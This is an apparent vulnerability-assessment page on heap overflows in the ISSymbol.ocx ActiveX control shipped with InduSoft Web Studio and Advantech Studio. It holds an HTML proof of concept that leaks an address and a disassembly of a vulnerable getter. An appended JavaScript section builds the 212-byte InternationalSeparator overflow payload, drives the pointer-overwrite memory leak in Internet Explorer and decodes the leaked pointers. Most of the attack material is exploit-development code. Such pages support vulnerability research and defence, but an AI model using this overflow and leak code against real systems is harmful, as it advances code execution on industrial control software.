InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow
Description
Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method.
Technical Analysis
Info Leak Through ForceRemoteBehavior
The ForceRemoteBehavior getter, when using an “uninitialized” issymbol
object, allows disclosing an address from issymbol. Issymbol isn’t ASLR
compatible, but could rebase. Anyway, issymbol doesn’t contain pointers
to interesting APIs for ASLR bypass, so even though it would be easy
to use the issymbol.dll, it won’t be useful because of this.
```html
<html>
<body>
<object classid='clsid:3c9dff6f-5cb0-422e-9978-d6405d10718f' id='test'></object>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script language='javascript'>
alert(test.ForceRemoteBehavior);
</script>
</body>
</html>
```
Info Leak through StartupColumnTranslate
Overflowing the vulnerable InternationalSeparator() method with 212 bytes
allows reaching the pointer to the StartupColumnTranslate property (string).
By overflowing this pointer, it should be possible to retrieve arbitrary data
from the memory map by using the StartupColumnTranslate getter:
```asm
.text:1000EF40 StartupColumnTranslate_sub_1000EF40 proc near ; DATA XREF: .rdata:101DCE98o
.text:1000EF40
.text:1000EF40 var_10 = byte ptr -10h
.text:1000EF40 var_C = dword ptr -0Ch
.text:1000EF40 var_4 = dword ptr -4
.text:1000EF40
.text:1000EF40 push 0FFFFFFFFh
.text:1000EF42 push offset sub_101B7579
.text:1000EF47 mov eax, large fs:0
.text:1000EF4D push eax
.text:1000EF4E push ecx
.text:1000EF4F push esi
.text:1000EF50 mov eax, ___security_cookie
.text:1000EF55 xor eax, esp
.text:1000EF57 push eax
.text:1000EF58 lea eax, [esp+18h+var_C]
.text:1000EF5C mov large fs:0, eax
.text:1000EF62 add ecx, 2540h ; ecx + 2540h => pointer to StartupColumnTranslate property
.text:1000EF68 push ecx
.text:1000EF69 lea ecx, [esp+1Ch+var_10]
.text:1000EF6D call ds:??0?$CStringT@_WV?$StrTraitMFC_DLL@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@QAE@ABV01@@Z ; ATL::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>(CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>> const &)
.text:1000EF73 lea ecx, [esp+18h+var_10]
.text:1000EF77 mov [esp+18h+var_4], 0
.text:1000EF7F call ds:?AllocSysString@?$CStringT@_WV?$StrTraitMFC_DLL@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@QBEPA_WXZ ; ATL::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::AllocSysString(void)
.text:1000EF85 lea ecx, [esp+18h+var_10] ; void *
.text:1000EF89 mov esi, eax
.text:1000EF8B call ds:__imp_??1?$CStringT@_WV?$StrTraitMFC_DLL@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@QAE@XZ ; ATL::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::~CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>(void)
.text:1000EF91 mov eax, esi
.text:1000EF93 mov ecx, [esp+18h+var_C]
.text:1000EF97 mov large fs:0, ecx
.text:1000EF9E pop ecx
.text:1000EF9F pop esi
.text:1000EFA0 add esp, 10h
.text:1000EFA3 retn
.text:1000EFA3 StartupColumnTranslate_sub_1000EF40 endp
```
PROBLEM: It’s using the Microsoft Foundation Classes, and creating fake
string objects in memory isn’t so easy! We should dig into that;
it should be possible with more work!
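An added example of driving the leak primitive described in the assessment above; it is not code from the assessment, from AttackerKB, or from InduSoft. The encoding and decoding helpers run under Node.js and are exercised against a mock control; `ieLeak()` is the two-step sequence (set `InternationalSeparator`, read `StartupColumnTranslate`) that only does anything inside Internet Explorer with ISSymbol.ocx registered. It assumes that the setter copies the raw bytes of the BSTR it receives (so each UTF-16 code unit of a JavaScript string supplies two little-endian bytes), that the control is 32-bit (a 4-byte pointer), and that the 212-byte distance to the pointer is as the assessment states; `mockControl`, `buildLeakPayload`, `leakToU32s` and the address values are invented for illustration.

```javascript
'use strict';

// Added example, not code from the assessment or from InduSoft.
// Assumptions (not on the page): the setter copies the BSTR's raw bytes, so
// every UTF-16 code unit of a JS string contributes two little-endian bytes;
// the control is 32-bit, so the clobbered pointer is 4 bytes wide; 212 is the
// distance the assessment gives from the copy start to the pointer.

const PAD_TO_POINTER = 212;   // bytes from start of copy to the CString pointer
const FILLER = 0x41;          // 'A' padding; any non-NUL byte works

// Pack an even-length byte array into a JS string, two bytes per code unit.
function bytesToWideString(bytes) {
  if (bytes.length % 2 !== 0) throw new Error('byte count must be even');
  let s = '';
  for (let i = 0; i < bytes.length; i += 2) {
    s += String.fromCharCode(bytes[i] | (bytes[i + 1] << 8));
  }
  return s;
}

// Unpack a string returned by a property getter into its raw bytes.
// AllocSysString stops at the first NUL wchar, so a single leak never spans
// a 16-bit zero; that is a limit of the primitive, not of this decoder.
function wideStringToBytes(s) {
  const out = [];
  for (let i = 0; i < s.length; i++) {
    const cu = s.charCodeAt(i);
    out.push(cu & 0xff, cu >>> 8);
  }
  return out;
}

// Little-endian 32-bit encode/decode.
function u32le(v) {
  return [v & 0xff, (v >>> 8) & 0xff, (v >>> 16) & 0xff, (v >>> 24) & 0xff];
}
function leakToU32s(bytes) {
  const words = [];
  for (let i = 0; i + 4 <= bytes.length; i += 4) {
    words.push((bytes[i] | (bytes[i + 1] << 8) | (bytes[i + 2] << 16) |
                (bytes[i + 3] << 24)) >>> 0);
  }
  return words;
}

// Value to assign to InternationalSeparator: filler up to the
// StartupColumnTranslate pointer, then the address to read from. The getter
// runs the CStringT copy constructor on whatever the pointer names, so `addr`
// must point at something shaped like a CString buffer (the assessment's
// PROBLEM note); choosing such an address is outside this helper.
function buildLeakPayload(addr, padBytes = PAD_TO_POINTER) {
  const bytes = new Array(padBytes).fill(FILLER);
  bytes.push(...u32le(addr));
  return bytesToWideString(bytes);
}

// The leak sequence as it would run in IE, where `ctrl` is
// document.getElementById('test') for the <object> in the PoC above.
function ieLeak(ctrl, addr) {
  ctrl.InternationalSeparator = buildLeakPayload(addr);  // overflow: clobber pointer
  return wideStringToBytes(ctrl.StartupColumnTranslate); // getter: copy from addr
}

// Mock control for running the sequence outside IE: records what the setter
// received and answers the getter with constructed bytes, as a real leak would.
function mockControl(leakedBytes) {
  const state = { written: null };
  return {
    state,
    set InternationalSeparator(v) { state.written = wideStringToBytes(v); },
    get StartupColumnTranslate() { return bytesToWideString(leakedBytes); },
  };
}

// Usage against the mock (constructed "leaked" bytes); in IE pass the real
// <object> element instead of mockControl(...).
const demoWords = leakToU32s(ieLeak(mockControl(u32le(0x1000ef40)), 0x10001000));
console.log('leaked:', demoWords.map((w) => '0x' + w.toString(16)).join(' '));
```

The decoder is the useful part: a JavaScript string from an ActiveX getter carries two bytes per code unit, so leaked pointers have to be reassembled little-endian from consecutive code units, and any 16-bit zero in the target memory ends the copy.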
General Information
Vendors
- advantech,
- indusoft
Products
- advantech studio 6.1,
- thin client 7.0,
- web studio,
- web studio 6.1